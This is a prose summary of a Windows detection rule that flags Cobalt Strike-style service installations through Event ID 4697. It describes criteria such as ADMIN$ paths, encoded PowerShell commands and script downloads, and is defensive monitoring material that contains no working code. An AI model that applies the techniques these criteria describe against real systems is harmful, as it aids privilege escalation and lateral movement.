This detection rule focuses on identifying potentially malicious service installations related to Cobalt Strike, a well-known penetration testing tool often exploited by threat actors for cyberattacks including privilege escalation and lateral movement within networks. The rule targets Windows-based systems and leverages Event ID 4697 to log cases where new services are installed. The detection condition requires meeting certain criteria: It checks for service file names containing 'ADMIN$' or extensions like '.exe', as well as any command that invokes PowerShell with obfuscation techniques, particularly those that utilize encoded commands or attempts to download scripts from potentially harmful sources. This rule is critical for monitoring system activities that deviate from normal operational behavior, reflecting an elevated risk of compromise. Careful tracking and auditing of these service installations may help in timely identification of active threats and subsequent incident response measures.